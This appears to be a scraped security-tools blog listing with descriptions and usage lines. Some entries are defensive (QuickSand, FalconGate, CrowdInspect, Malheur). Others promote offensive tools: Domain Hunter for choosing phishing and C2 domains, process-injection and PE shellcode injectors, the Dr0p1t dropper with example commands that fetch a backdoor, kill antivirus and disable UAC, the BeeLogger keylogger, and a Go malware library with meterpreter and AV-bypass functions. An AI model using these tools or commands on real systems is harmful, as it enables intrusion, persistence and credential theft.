Domain Hunter - Checks Expired Domains, Bluecoat Categorization, And Archive.Org History To Determine Good Candidates For Phishing

Domain name selection is an important aspect of preparation for penetration tests and especially Red Team engagements. Commonly, domains that were used previously for benign purposes and were properly categorized can be purchased for only a few dollars. Such domains can allow a team to bypass reputation based web filters and network egress restrictions for phishing and C2 related tasks.

This Python based tool was written to quickly query the Expireddomains.net search engine for expired/available domains with a previous history of use. It then optionally queries for domain reputation against services like BlueCoat and IBM X-Force. The primary tool output is a timestamped HTML table style report.

Changes

- June 6 2017
    + Added python 3 support
    + Code cleanup and bug fixes
    + Added Status column (Available, Make Offer, Price,Backorder,etc)

Features

• Retrieves specified number of recently expired and deleted domains (.com, .net, .org primarily)
• Retrieves available domains based on keyword search
• Reads line delimited input file of potential domains names to check against reputation services
• Performs reputation checks against the Blue Coat Site Review and IBM x-Force services
• Sorts results by domain age (if known)
• Text-based table and HTML report output with links to reputation sources and Archive.org entry

Usage
Install Requirements

pip install -r requirements.txt
or
pip install requests texttable beautifulsoup4 lxml

List DomainHunter options

python ./domainhunter.py
usage: domainhunter.py [-h] [-q QUERY] [-c] [-r MAXRESULTS] [-w MAXWIDTH]

Checks expired domains, bluecoat categorization, and Archive.org history to
determine good candidates for C2 and phishing domains

optional arguments:
  -h, --help            show this help message and exit
  -q QUERY, --query QUERY
                        Optional keyword used to refine search results
  -c, --check         Perform slow reputation checks
  -r MAXRESULTS, --maxresults MAXRESULTS
                        Number of results to return when querying latest
                        expired/deleted domains (min. 100)

Use defaults to check for most recent 100 domains and check reputation

python ./domainhunter.py

Search for 1000 most recently expired/deleted domains, but don't check reputation against Bluecoat or IBM xForce

python ./domainhunter.py -r 1000 -n

Retreive reputation information from domains in an input file

python ./domainhunter.py -f <filename>

Search for available domains with search term of "dog" and max results of 100

./domainhunter.py -q dog -r 100 -c
 ____   ___  __  __    _    ___ _   _   _   _ _   _ _   _ _____ _____ ____
|  _ \ / _ \|  \/  |  / \  |_ _| \ | | | | | | | | | \ | |_   _| ____|  _ \
| | | | | | | |\/| | / _ \  | ||  \| | | |_| | | | |  \| | | | |  _| | |_) |
| |_| | |_| | |  | |/ ___ \ | || |\  | |  _  | |_| | |\  | | | | |___|  _ <
|____/ \___/|_|  |_/_/   \_\___|_| \_| |_| |_|\___/|_| \_| |_| |_____|_| \_\

Expired Domains Reputation Checker

DISCLAIMER:
This is for educational purposes only!
It is designed to promote education and the improvement of computer/cyber security.
The authors or employers are not liable for any illegal act or misuse performed by any user of this tool.
If you plan to use this content for illegal purpose, don't.  Have a nice day :)

********************************************
Start Time:             20170301_113226
TextTable Column Width: 400
Checking Reputation:    True
Number Domains Checked: 100
********************************************
Estimated Max Run Time: 33 minutes

[*] Downloading malware domain list from http://mirror1.malwaredomains.com/files/justdomains
[*] Fetching expired or deleted domains containing "dog"...
[*]  https://www.expireddomains.net/domain-name-search/?q=dog
[*] BlueCoat Check: Dog.org.au
[+] Dog.org.au is categorized as: Uncategorized
[*] IBM xForce Check: Dog.org.au
[+] Dog.org.au is categorized as: Not found.
[*] BlueCoat Check: Dog.asia
[+] Dog.asia is categorized as: Uncategorized
[*] IBM xForce Check: Dog.asia
[+] Dog.asia is categorized as: Not found.
[*] BlueCoat Check: HomeDog.net
[+] HomeDog.net is categorized as: Uncategorized
[*] IBM xForce Check: HomeDog.net
[+] HomeDog.net is categorized as: Not found.
[*] BlueCoat Check: PolyDogs.com
[+] PolyDogs.com is categorized as: Uncategorized
[*] IBM xForce Check: PolyDogs.com
[+] PolyDogs.com is categorized as: Not found.
[*] BlueCoat Check: SaltyDog.it
[+] SaltyDog.it is categorized as: Uncategorized
[*] IBM xForce Check: SaltyDog.it
[+] SaltyDog.it is categorized as: Not found.
[*]  https://www.expireddomains.net/domain-name-search/?start=25&q=dog
[*] BlueCoat Check: FetchDoggieStore.com
[+] FetchDoggieStore.com is categorized as: Society/Daily Living
[*] IBM xForce Check: FetchDoggieStore.com
[+] FetchDoggieStore.com is categorized as: {u'General Business': True}

Report Header Reference

• Domain: Target Domain
• Birth: First seen on Archive.org
• Entries: Number of entries in Archive.org
• TLDs Available: Top level top available
• Bluecoat Categorization: Bluecoat category
• IBM-xForce Categorization: IBM-xForce category
• WatchGuard: Watchguard reputation
• Namecheap: Link to namecheap.com
• Archive.org: Link to archive.org

Download Domain Hunter

Read More

InjectProc - Process Injection Techniques

Process injection is a very popular method to hide malicious behavior of code and are heavily used by malware authors.

There are several techniques, which are commonly used: DLL injection, process replacement (a.k.a process hollowing), hook injection and APC injection.

Most of them use same Windows API functions: OpenProcess, VirtualAllocEx, WriteProcessMemory, for detailed information about those functions, use MSDN.

DLL injection:

• Open target process.
• Allocate space.
• Write code into the remote process.
• Execute the remote code.

Process replacement:

• Create target process and suspend it.
• Unmap from memory.
• Allocate space.
• Write headers and sections into the remote process.
• Resume remote thread.

Hook injection:

• Find/Create process.
• Set hook

APC injection:

• Open process.
• Allocate space.
• Write code into remote threads.
• "Execute" threads using QueueUserAPC.

Download
Windows x64 binary - x64 bit DEMO

Dependencies:
vc_redist.x64 - Microsoft Visual C++ Redistributable

DEMO

Download InjectProc

Read More

QuickSand.io - Tool For Scanning Streams Within Office Documents Plus Xor DB Attack

QuickSand is a compact C framework to analyze suspected malware documents to 1) identify exploits in streams of different encodings, 2) locate and extract embedded executables. By having the ability to locate embedded obfuscated executables, QuickSand could detect documents that contain zero-day or unknown obfuscated exploits.

File Formats For Exploit and Active Content Detection

• doc, docx, docm, rtf, etc
• ppt, pptx, pps, ppsx, etc
• xls, xlsx, etc
• mime mso
• eml email

File Formats For Executable Detection

• All of the above, plus PDF.
• Any document format such as HWP.

Lite Version - Mplv2 License

• Key dictionary up to 256 byte XOR
• Bitwise ROL, ROR, NOT
• Addition or substraction math cipher
• Executable extraction: Windows, Mac, Linux, VBA
• Exploit search
• RTF pre processing
• Hex stream extract
• Base 64 Stream extract
• Embedded Zip extract
• ExOleObjStgCompressedAtom extract
• zLib Decode
• Mime Mso xml Decoding
• OpenXML decode (unzip)
• Yara signatures included: Executables, active content, exploits CVE 2014 and earlier

Example results and more info blog post

Full Version - Commercial License

• Key cryptanalysis 1-1024 bytes factors of 2; or a specified odd size 1-1024 bytes
• 1 Byte zerospace not replaced brute force XOR search
• XOR Look Ahead cipher
• More Yara signatures included: All lite plus most recent exploits 2014-2016 for CVE identification
• Try the full version online at QuickSand.io

Dependencies (not included)

• Yara 3.4+
• zlib 1.2.1+
• libzip 1.1.1+

Distributed components under their own licensing

• MD5 by RSA Data Security, Inc.
• SHA1 by Paul E. Jones
• SHA2 by Aaron D. Gifford
• jWrite by TonyWilk for json output
• tinydir by Cong Xu, Baudouin Feildel for directory processing

Quick Start

• ./build.sh
• ./quicksand.out -h
• ./quicksand.out malware.doc

Documentation

QuickSand.io

Download QuickSand

Read More

MalwareSearch - A Command Line Tool To Find Malwares

Tool developed for searching malwares at openmalware.org by command line, allowing specific malware download by shell. Soon we'll input more sources like MalShare, MalwareBlacklist, Malware.lu's AVCaesar and Malwr.

Usage
Optional Arguments:

$ malwaresearch.py [--h HELP] [-f FIND] [-w WRITE] 
usage: malwaresearch.py [-h] [-f Sample | -d Hash] [-w File] [-o Int]

MalwareSearch 0.1 [github.com/MalwareReverseBrasil/malwaresearch.git]

optional arguments:
  -h, --help            show this help message and exit
  -f Sample, --find Sample
                        Enter your search via MD5, SHA1, SHA256 or an Common
                        Signature name.
  -d Hash, --download Hash
                        Download selected sample
  -w File, --write File
                        Save the output results.
  -o Int, --output Int  Show number of results

Developers:

• Ialle Teixeira, Security/Malware Researcher blog,
• Vandré Augusto, Electric Engineer & Malware Researcher blog.

Download MalwareSearch

Read More

InfectPE - Inject Custom Code into PE File

Using this tool you can inject x-code/shellcode into PE file. InjectPE works only with 32-bit executable files.

Why you need InjectPE?

• You can test your security products.
• Use in a phishing campaign.
• Learn how PE injection works.
• ...and so on.

In the project, there is hardcoded x-code of MessageBoxA, you can change it.

Download
Windows x86 binary - Hardcoded MessageBoxA x-code, only for demos.

Dependencies:
vc_redist.x86 - Microsoft Visual C++ Redistributable

Usage

.\InfectPE.exe .\input.exe .\out.exe code

X-code is injected into code section, this method is more stealthy, but sometimes there is no enough space in the code section.

.\InfectPE.exe .\input.exe .\out.exe largest

X-code is injected into a section with the largest number of zeros, using this method you can inject bigger x-code. This method modifies characteristics of the section and is a bit more suspicious.

.\InfectPE.exe .\input.exe .\out.exe resize

Expand the size of code section and inject x-code. This technique, like "code" one, is less suspicious, also you can inject much bigger x-code.
In the patched file, ASLR and NX are disabled, for the more technical information you can analyze VS project.

Demo
"code" and "largest" techniques.

"resize" technique.

Download InfectPE

Read More

MultiScanner - Modular File Scanning/Analysis Framework

MultiScanner is a file analysis framework that assists the user in evaluating a set of files by automatically running a suite of tools for the user and aggregating the output. Tools can be custom built python scripts, web APIs, software running on another machine, etc. Tools are incorporated by creating modules that run in the MultiScanner framework.

Modules are designed to be quickly written and easily incorporated into the framework. Currently written and maintained modules are related to malware analytics, but the framework is not limited to that scope. For a list of modules you can look in modules, descriptions and config options can be found in docs/modules.md

Requirements

Python 2.7 is recommended. Compatibility with 2.7+ and 3.3+ is supported but not thoroughly maintained and tested. Please submit an issue or a pull request fixing any issues found with other versions of Python.

An installer script is included in the project install.sh, which installs the prerequisites on most systems.

Installation

MultiScanner

If you're running on a RedHat or Debian based linux distribution you should try and run install.sh. Otherwise the required python packages are defined in requirements.txt.

MultiScanner must have a configuration file to run. Generate the MultiScanner default configuration by running python multiscanner.py init after cloning the repository. This command can be used to rewrite the configuration file to its default state or, if new modules have been written, to add their configuration to the configuration file.

Analytic Machine

Default modules have the option to be run locally or via SSH. The development team runs MultiScanner on a Linux host and hosts the majority of analytical tools on a separate Windows machine. The SSH server used in this environment is freeSSHd from http://www.freesshd.com/.

A network share accessible to both the MultiScanner and the Analytic Machines is required for the multi-machine setup. Once configured, the network share path must be identified in the configuration file, config.ini. To do this, set the copyfilesto option under [main] to be the mount point on the system running MultiScanner. Modules can have a replacement path option, which is the network share mount point on the analytic machine.

Module Writing

Modules are intended to be quickly written and incorporated into the framework. A finished module must be placed in the modules folder before it can be used. The configuration file does not need to be manually updated. See docs/module_writing.md for more information.

Module Configuration

Modules are configured within the configuration file, config.ini. See docs/modules.md for more information.

Python API
MultiScanner can be incorporated as a module in another projects. Below is a simple example of how to import MultiScanner into a Python script.

import multiscanner
output = multiscanner.multiscan(FileList)
Results = multiscanner.parse_reports(output, python=True)

Results is a dictionary object where each key is a filename of a scanned file.
multiscanner.config_init(filepath) will create a default configuration file at the location defined by filepath.

Other Reading
For more information on module configuration or writing modules check the docs folder.

Download MultiScanner

Read More

FalconGate - A smart gateway to stop hackers and Malware attacks

A smart gateway to stop hackers, Malware and more...

Motivation
Cyber attacks are on the raise. Hacker and cyber criminals are continuously improving their methods and building new tools and Malware with the purpose of hacking your network, spying on you and stealing valuable data. Recently a new business model has become popular among hackers: the use of Ransomware to encrypt your data and ask for a ransom to unlock it. These attacks have extended also to the Internet of Things (IoT) devices since many of them are vulnerable by design and hackers can leverage them to compromise other devices in your network or launch DDoS attacks towards other targets. Traditionally securing a network against such attacks has been an expensive item which could be afforded just by medium to large companies. With FalconGate we're aiming to change this and bring "out of the box" security for free to people, small businesses and anyone else in need.

Features
FalconGate is an open source smart gateway which can protect your home devices against hackers, Malware like Ransomeware and other threats. It detects and alerts on hacker intrusions on your home network as well as other devices misbehaving and attacking targets within your network or in the Internet.
Currently FalconGate is able to:

• Block several types of Malware based on open source blacklists (see detailed list in file intel-sources.md )
• Block Malware using the Tor network
• Detect and report potential Malware DNS requests based on VirusTotal reports
• Detect and report the presence of Malware executables and other components based on VirusTotal reports
• Detect and report Domain Generation Algorithm (DGA) Malware patterns
• Detect and report on Malware spamming activity
• Detect and report on internal and outbound port scans
• Report details of all new devices connected to your network
• Block ads based on open source lists
• Monitor a custom list of personal or family accounts used in online services for public reports of hacking

Getting Started
FalconGate was built on top of other open source software so it has multiple dependencies which must be configured correctly for it to work. The fastest way to get FalconGate up and running is to deploy one of the supported system images from our downloads page .

Supported Platforms
Currently FalconGate has been successfully tested and implemented on Raspberry Pi (RPi 2 model B) and Banana Pi (BPI-M2+) using Raspian Jessie Lite as base image.
Jessie Lite for RPi
Jessie Lite for BPi
It should be compatible with other Debian ARM images as well but this has not been tested yet.

Prerequisites
FalconGate has a number of software dependencies:

• Bro IDS
• Python 2.7
• Nginx
• Dnsmasq
• Exim
• PHP

It depends also on several Python modules (see requirements.txt file for details)

Other dependencies
The devices's malware detection can be enhanced with the utilization of VirusTotal's personal free API
Currently FalconGate uses have i been pwned public API to detect whether credentials and/or other data from personal accounts have been stolen by hackers from third party sites.

Deploying FalconGate from a supported image
This is the fastest way to get FalconGate up and running in your network.

• Download the correct system image for your device from the downloads page .
  
• Extract the image to a folder in your computer.
  
• Write the image to your SD card.
  

You can use the guides below as reference for Raspberry Pi:
Linux
Mac OS
Windows

• Insert the SD card in your device and plug it to any available ethernet port in your router.
  
• Power on your device and wait few minutes until it will acquire the correct configuration for your network.
  
• Login to your router and disable its DHCP server function
  
• Login to FalconGate's web app and configure the email address(es) to be used as recipients for alerts and your VirusTotal API key
  

https://[FalconGate IP address]
Username: admin
Password: falcongate

Usually FalconGate will assign to its administration interface an IP ending in ".2" (e.g. 192.168.0.2) which is derived from the network's gateway IP Change the default password after the first logon to the application

• Navigate to the "Configuration" page and fill in the correct fields

This configuration it's not mandatory but highly desired if you want to unleash FalconGate's full power. In order to obtain a free VirusTotal API key you must register at ( https://www.virustotal.com/ ).

Installing FalconGate from source
Follow the steps below to configure your device and install FalconGate from this repository.

• Download and install the OS image to your Raspberry Pi or Banana Pi device

This is well documented in multiple sources out there.

• Connect to your device via SSH

$ ssh pi@<IP assigned to your RPi>

• Install Git if you don't have it yet

$ sudo apt-get update
$ sudo apt-get install git

• Clone FalconGate's repository to a local folder

$ cd /opt
$ sudo git clone https://github.com/A3sal0n/FalconGate.git

• Run the installation script inside FalconGate's folder

$ cd FalconGate/
$ sudo python install.py

Now you can go for a walk and prepare a coffee or any other beverage of your choice because the installation usually takes some time. The script will print the progress to the console.
The script should finish without issues if you're using the supported platforms. If you're attempting to install FalconGate experimentally to a new hardware platform/OS and you get some errors during the installation you could try to correct the issues manually and continue to execute the steps listed in the installation script.

• Login to your router and disable its DHCP server function

FalconGate was designed to work connected to a router over ethernet. It does not replaces the functions of your router. Instead it becomes a layer of security between your devices and your router. Disabling your router's DHCP allows FalconGate to become the new gateway for all the devices connected to the same router in your VLAN.

• Reboot your device to apply all the configuration changes
  
• Login to FalconGate's web app and configure the email address(es) to be used as recipients for alerts and your VirusTotal API key
  

Deployment
Some important considerations to keep in mind when deploying FalconGate to a real environment: home or production network.

• Change the default SSH password in your Raspberry Pi or Banana Pi devices
• Regenerate the openssh-server certificates for SSH encryption

Limitations
Currently the RPi 2 model B and the Banana Pi M2+ have both a single ethernet interface so the traffic forwarding in the gateway it's done using this single interface. This has an impact in networks with fast Internet connection (e.g. > 50Mb/s). However it's still good enough for the home networks of many people's and even some small businesses.

Download FalconGate

Read More

Dr0p1t-Framework 1.2 - A Framework That Creates An Advanced FUD Dropper With Some Tricks

Have you ever heard about trojan droppers ?

In short dropper is type of trojans that downloads other malwares and Dr0p1t gives you the chance to create a dropper that bypass most AVs and have some tricks ;)

Features

• Framework works with Windows and Linux
• Download executable on target system and execute it silently..
• The executable size small compared to other droppers generated the same way
• Self destruct function so that the dropper will kill and delete itself after finishing it work
• Adding executable after downloading it to startup
• Adding executable after downloading it to task scheduler ( UAC not matters )
• Finding and killing the antivirus before running the malware
• Running a custom ( batch|powershell|vbs ) file you have chosen before running the executable
• The ability to disable UAC
• In running powershell scripts it can bypass execution policy
• Using UPX to compress the dropper after creating it
• Choose an icon for the dropper after creating it

Screenshots

On Windows

On Linux (Backbox)

Help menu

Usage: Dr0p1t.py Malware_Url [Options]

options:
  -h, --help   show this help message and exit
  -s           Add your malware to startup (Persistence)
  -t           Add your malware to task scheduler (Persistence)
  -k           Kill antivirus process before running your malware.
  -b           Run this batch script before running your malware. Check scripts folder
  -p           Run this powershell script before running your malware. Check scripts folder
  -v           Run this vbs script before running your malware. Check scripts folder
  --only32     Download your malware for 32 bit devices only
  --only64     Download your malware for 64 bit devices only
  --upx        Use UPX to compress the final file.
  --nouac      Disable UAC on victim device
  --nocompile  Tell the framework to not compile the final file.
  -i           Use icon to the final file. Check icons folder.
  -q           Stay quite ( no banner )
  -u           Check for updates
  -nd          Display less output information

Examples

./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --nouac -i flash.ico

Prerequisites

• Python 2 or Python 3.

The recommended version for Python 2 is 2.7.x , the recommended version for Python 3 is 3.5.x and don't use 3.6 because it's not supported yet by PyInstaller

• Python libraries requirements in requirements.txt

Needed dependencies for linux

• Wine
• Python 2.7 on Wine Machine

Note : You must have root access

Installation
if you are on linux and do

git clone https://github.com/D4Vinci/Dr0p1t-Framework
chmod 777 -R Dr0p1t-Framework
cd Dr0p1t-Framework
pip install -r requirements.txt
./Dr0p1t.py

And if you are on windows download it and then do

cd Dr0p1t-Framework
pip install -r requirements.txt
pip install -r windows_requirements.txt
./Dr0p1t.py

Libraries in windows_requirements.txt are used to enable unicodes in windows which will make coloring possible 

Tested on:

• Kali Linux - SANA
• Ubuntu 14.04-16.04 LTS
• Windows 10/8.1/8

Changelog v1.2

• Pyinstaller compiling in Linux using wine
• Pyinstaller compiling in Windows will not use UPX and that will fix the compiling in windows
• Added the ability to disable and bypass UAC
• Updated the antivirus list in the antivirus killer
• Added SelfDestruct function so that the dropper will kill and delete itself after finishing it work
• Full framework rewrite and recheck to fix errors, typos and replacing some libraries to make the size of the final file smaller
• Started working in some SE tricks to fool the user and there's a lot of good options in the way ;) Stay Tuned

Contact

• Twitter
• Facebook

Download Dr0p1t-Framework

Read More

BeeLogger - Generate Emailing Keyloggers to Windows on Linux

Generate gmail emailing keyloggers to windows on linux, powered by python and compiled by pyinstaller.

Features

• Send logs each 120 seconds.
• Send logs when chars > 50.
• Send logs with gmail.
• Some Phishing methods are included.
• Multiple Session disabled.
• Bypass UAC.

Prerequisites

• apt
• wine
• wget
• Linux
• sudo
• python2.7
• python 2.7 on Wine Machine
• pywin32 on Wine Machine
• pythoncom on Wine Machine

Tested on:

• Kali Linux - SANA
• Kali Linux - ROLLING
• Ubuntu 14.04-16.04 LTS
• Debian 8.5
• Linux Mint 18.1

Cloning:

git clone https://github.com/4w4k3/BeeLogger/.git

Running:

sudo python bee.py

If you have another version of Python:

sudo python2.7 bee.py

Contact:
4w4k3@protonmail.com

Download BeeLogger

Read More

Dr0p1t-Framework - A Framework That Creates An Advanced FUD Dropper With Some Tricks

Have you ever heard about trojan droppers ? you can read about them from here .
Dr0p1t let you create dropper like any tool but this time FUD with some tricks ;)

Features

• Works with Windows and Linux
• Adding malware after downloading it to startup
• Adding malware after downloading it to task scheduler
• Finding and killing the antivirus before running the malware
• Running a custom (batch|powershell|vbs) file you have choosen before running the malware
• In running powershell scripts it can bypass execution policy
• Using UPX to compress the dropper after creating it
• Choose an icon for the dropper after creating it

Screenshots

On Windows

On Linux (Backbox)

Help menu

Usage: Dr0p1t.py Malware_Url [Options]

options:
  -h, --help   show this help message and exit
  -s           Add your malware to startup (Persistence)
  -t           Add your malware to task scheduler (Persistence)
  -k           Kill antivirus process before running your malware.
  -b           Run this batch script before running your malware. Check scripts folder
  -p           Run this powershell script before running your malware. Check scripts folder
  -v           Run this vbs script before running your malware. Check scripts folder
  --only32     Download your malware for 32 bit devices only
  --only64     Download your malware for 64 bit devices only
  --upx        Use UPX to compress the final file.
  -i           Use icon to the final file. Check icons folder.
  -q           Stay quite ( no banner )
  -u           Check for updates
  -nd          Display less output information

Examples

./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1

Prerequisites

• Python 3.x( prefered 3.5 )
• Python libraries requirements in requirements.txt

Installation
First download it by

git clone https://github.com/D4Vinci/Dr0p1t-Framework

if you are on linux and do

cd Dr0p1t-Framework
pip install -r requirements.txt
./Dr0p1t.py

And if you are on windows download it and then do

cd Dr0p1t-Framework
pip install -r requirements.txt
pip install -r windows_requirements.txt
./Dr0p1t.py

Libraries in windows_requirements.txt are used to enable unicodes in windows which will make coloring possible 

Todo

• Python 2 support
• Work on UAC bypass
• Work on spreading on device and may be in lan too
• Injecting dr0pp3r to another program
• More modules

Download Dr0p1t-Framework

Read More

EGESPLOIT - A Golang Library For Malware Development

EGESPLOIT is a golang library for malware development, it has few unique functions for meterpreter integration.

DOCUMENTATION

 CalculateChecksum(x) : Function calculates x digit 8 bit checksum for reverse HTTP/HTTPS meterpreter connections, returns the calculated checksum as string.

 Meterpreter(ConType, Address) : Function launches a meterpreter connection, takes 2 parameters connection type (HTTP/HTTPS/TCP) and Address (127.0.0.1:4444), function returns a string for error handling.

 Persistence() : Function copys and adds the running binary to startup registry.

 Sysguide() : Function returns the current directory, running OS version, username, antivirus name as strings.

 Keylogger(LOGS) : Function takes a string pointer as parameter and starts a keylogger,all key logs are saved at given parameter.

 Please(Command) : Function executes the given parameter with runas command. (Asks permission for higher level operations)  

 BypassAV() : Function bypasses the anti virus heroustic detections, takes a integer as parameter for defining the intensity level.

 Dispatch(Base64_Binary,BinaryName, Parameters) : Function drops a binary and executes it, takes tree strings as parameter base64 encoded binary, binary name and parameters.

 Distract() : Functions execute a forkbomb bat file for distracting the user.

 Dos() : Function start a dos atack to given target (http://example.com)

 SyscallExecute(Shellcode) : Function executes the given shellcode(byte array) with system call.

 ThreadExecute(Shellcode) : Function executes the given shellcode(byte array) with CreateThread function.

 WifiList() : Functions returns he wifi connection history.

 #RSE#
 RSE stands for "Reduced Sized Exploits", functions under RSE folder are build with windows api calls for reducing payload sizes.

Download EGESPLOIT

Read More

MalwaRE - Malware Repository Framework

malwaRE is a malware repository website created using PHP Laravel framework, used to manage your own malware zoo. malwaRE was based on the work of Adlice team with some extra features.

If you guys have any improvements, please let me know or send me a pull request.

Features

• Self-hosted solution (PHP/Mysql server needed)
• VirusTotal results (option for uploading unknown samples)
• Search filters available (vendor, filename, hash, tag)
• Vendor name is picked from VirusTotal results in that order: Microsoft, Kaspersky, Bitdefender
• Add writeup url(s) for each sample
• Manage samples by tag
• Tag autocomplete
• VirusTotal rescan button (VirusTotal's score column)
• Download samples from repository

Download MalwaRE

Read More

Hook Analyser 3.1 - Malware Analysis Tool

Hook Analyser is a freeware application which allows an investigator/analyst to perform “static & run-time / dynamic” analysis of suspicious applications, also gather (analyse & co-related) threat intelligence related information (or data) from various open sources on the Internet.

Essentially it’s a malware analysis tool that has evolved to add some cyber threat intelligence features & mapping.

Hook Analyser is perhaps the only “free” software in the market which combines analysis of malware analysis and cyber threat intelligence capabilities. The software has been used by major Fortune 500 organisations.

Features/Functionality

• Spawn and Hook to Application – Enables you to spawn an application, and hook into it
• Hook to a specific running process – Allows you to hook to a running (active) process
• Static Malware Analysis – Scans PE/Windows executables to identify potential malware traces
• Application crash analysis – Allows you to analyse memory content when an application crashes
• Exe extractor – This module essentially extracts executables from running process/s

Download Hook Analyser 3.1

Read More

CrowdInspect - Scan of your running processes on Windows with Virus Total, WOT & MHR

CrowdInspect is a free professional grade tool for Microsoft Windows systems from CrowdStrike aimed to help alert you to the presence of malware that communicates over the network that may exist on your computer. It is a host-based real-time monitoring and recording tool utilizing multiple sources of information to detect untrusted or malicious network-active processes.

The tool runs on both 32 bit and 64 bit versions of Windows from XP and above.

Beyond simple network connections, CrowdInspect associates the connection entry with the process that is responsible for that activity. It can display the process name as a simple file name or as as an optional full file path.

In addition to the process name, the entry's process ID number, local port, local IP address, remote port, remote IP address and reverse resolved DNS name of the remote IP address is shown. The tool accommodates both IPv4 and IPv6 addresses.

CrowdInspect records details of any entry that is associated with a remote IP address and maintains a chronological list of these accessed by clicking the "Live/History" toolbar button to switch between the regular live netstat window and the history list window.

Perhaps the most useful aspect of CrowdInspect though is its ability to utilize several sources of information that can be used to determine the reputation of the process using the network connection and the reputation of the domain it is connecting to. This is achieved through the use of the following technologies and services:

Thread Injection Detection

Detection of code injection using custom proprietary code

Many pieces of malware achieve part of their goal by manipulating already running applications and injecting themselves into those processes. Regular antivirus products that only act upon the actual physical file contents would not identify this behavior. CrowdInspect features experimental detection of such behavior and the results of this test on each process can be seen in the “Inject” column.

● --  (o Gray icon)

○ Not applicable/not available. No process is not able to be tested.

● ??  (o Gray icon)

○ The process did not allow us to test for code injection.

● OK  (o Green)

○ The process did not appear to have any evidence of thread injection.

● !!  (o Red icon)

○ The entry appeared to have had a thread injected into its process. This is generally not a good thing or something usually encountered. Note though that there may be some classes of specialized software that does exhibit this behavior. The process/application should be investigated further.

VirusTotal

Multiple antivirus engine analysis results queried by SHA256 file hash

<http://www.virustotal.com>

Shown in the "VT" column of the tool are the basic summary results of querying the VirusTotal service against the file in question (actually the SHA256 hash of the file contents). VirusTotal utilizes multiple antivirus engines to analyze submitted files and we query its database to see if the file hash is in the database and if so, how the antivirus engines rated it. The value here can be one of the following:

● --  (o Gray icon)

○ Not applicable/not available. No connection to the VirusTotal database was made or the process is not associated with a file.

● ??  (o Gray icon)

○ The entry does not exist in the VirusTotal database. This is probably good!

● 0% ... 100%  (o Green ... o Red icons)

○ The file is known to the VirusTotal database. This is the virus score. 0% means no antivirus vendor reported an issue with the process (very good). 100% means every antivirus vendor reported the process as problematic (very bad!)

More extensive details for the particular selected entry in the list can be seen by either clicking the "AV Results" toolbar button or selecting "View AV Test Results" from the right-click context menu for the selected item.

Note that it may take a short while before the results appear for each entry in the list due to rate throttling of connections to the service.

Team Cymru - Malware Hash Repository

Repository of known malware queried by MD5 file hash

<http://www.teamcymru.com>

Shown in the "MHR" column, Team Cymru maintains a repository of known malware that can be queried given an MD5 hash of the file contents. In this case we are simply querying for a yes/no answer so the results can be one of the following:

● --  (o Gray icon)

○ Not applicable/not available. No response was received from the Team Cymru service or the process is not associated with a file.

● ??  (o Gray icon)

○ The entry does not exist in the MHR database. This is probably good, although the absence of a positive response doesn't necessarily mean the process is not malware.

● !!  (o Red icon)

○ The entry DOES exist in the MHR database. The process is known to be malware. This is bad!

Web of Trust

Crowd-sourced domain name reputation system

<http://www.mywot.com>

Shown in the "WOT" column column of the tool are the basic summary results of querying the Web of Trust service against the reverse resolved domain name associated with the remote IP address of the connection's entry. The value here can be one of the following:

● --  (o Gray icon)

○ Not applicable/not available. No connection to the WoT database was made or the entry's remote IP address does not have a usable valid domain name associated with it.

● ??  (o Gray icon)

○ The entry does not exist in the WoT database.

● 0% ... 100%  (o Red ... o Green icons)

○ The WoT reputation score. 0% means that everybody who has rated this domain thinks it is untrustworthy. 100% means that everybody who has rated this domain thinks it is reputable and can be trusted.

To avoid unnecessary querying of the above services all results are cached such that no unique process or domain is ever queried more than once for the duration the tool is running.

Download CrowdInspect

Read More

[Killtrojan Syslog] Tool to detect malware activity on a system

Killtrojan Syslog is a free application to create a report about characteristics of the system to further analyze and look for signs of malware, also is intended to put the report in a specialized forum for users to help.

The tool has a very intuitive and easy to use for non-technical users to create their reports. Also useful for more advanced users who want to analyze a computer.

With the support logs with BBCode mode, you can paste the log generated in any forum (SMF, PHPBB, Invision ...) which will be detailed with clear colors for your reading.

Download Killtrojan Syslog

Read More

[Malheur v0.5.4] Malware Analyzer

Malheur is a tool for the automatic analysis of malware behavior (program behavior recorded from malicious software in a sandbox environment). It has been designed to support the regular analysis of malicious software and the development of detection and defense measures. Malheur allows for identifying novel classes of malware with similar behavior and assigning unknown malware to discovered classes.

Analysis of malware behavior?

Malheur builds on the concept of dynamic analysis: Malware binaries are collected in the wild and executed in a sandbox, where their behavior is monitored during run-time. The execution of each malware binary results in a report of recorded behavior. Malheur analyzes these reports for discovery and discrimination of malware classes using machine learning.

Malheur can be applied to recorded behavior of various format, as long as monitored events are separated by delimiter symbols, for example as in reports generated by the popular malware sandboxes CWSandbox, Anubis, Norman Sandbox and Joebox

.

Download Malheur

Read More

[Comodo Instant Malware Analysis] Online Automated Analysis System

If you have a suspicious file, please submit it online by using the form below. Once the file is submitted, COMODO Automated Analysis System will scan it and report back its findings.

Comodo Instant Malware Analysis

Read More

[Anubis] Online Analyzing Unknown Binaries

Anubis is a service for analyzing malware.

Submit your Windows executable or Android APK and receive an analysis report telling you what it does. Alternatively, submit a suspicious URL and receive a report that shows you all the activities of the Internet Explorer process when visiting this URL. 

Anubis

Read More

[Malware Classifier] Malware Analysis Tool

Adobe Malware Classifier is a command-line tool that lets antivirus analysts, IT administrators, and security researchers quickly and easily determine if a binary file contains malware, so they can develop malware detection signatures faster, reducing the time in which users' systems are vulnerable.

Malware Classifier uses machine learning algorithms to classify Win32 binaries – EXEs and DLLs – into three classes: 0 for “clean,” 1 for “malicious,” or “UNKNOWN.”

The tool was developed using models resultant from running the J48, J48 Graft, PART, and Ridor machine-learning algorithms on a dataset of approximately 100,000 malicious programs and 16,000 clean programs. 

The tool extracts seven key features from an unknown binary, feeds them to one of the four classifiers or all of them, and presents its classification of the unknown binary.

Download Malware Classifier

Read More

[VirusTotal] Online Malware Analysis Tool

